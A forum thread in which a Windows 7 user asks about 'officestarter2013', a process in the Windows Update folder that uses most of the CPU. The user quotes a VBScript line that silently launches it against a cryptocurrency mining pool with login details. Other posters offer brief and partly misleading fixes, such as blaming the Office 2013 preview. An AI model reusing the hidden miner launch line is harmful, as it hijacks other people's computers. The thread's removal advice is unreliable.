Recently my PC (windows 7 64 bit) has been running slowly every so often.

When i open task manager it shows an application called 'officestarter2013' running and using over 90% of cpu.

The 'officestarter2013' exe file is in the windows update folder, if i delete the exe, when windows restarts it mentions the missing file

Is there any way to remove it ?

thanks

EDIT:

Just opened the windows update folder where the file is located and i opened a 'VBScript file' which had the following entry at the bottom of a list

MSG_String = "OfficeStarter2013.exe --url http://mine.pool-x.eu:8337/ --userpass connect.1:x"
Ret = WshShell.Run(MSG_String,0,False)

It looks a bit suspect to me ? Should i be concerened

thanks

If you run Msconfig, Then look at the startup tab, Is there anything relating to it there?

If there is, Disable it, delete the exe and then reboot. Problem should be solved.

No nothing there with reference to that file.

The file doesnt run all the time, its not running now.

I know when its running as my pc slows down

Did you download and install the MS office 2013 consumer preview, since it might have something to do with that.
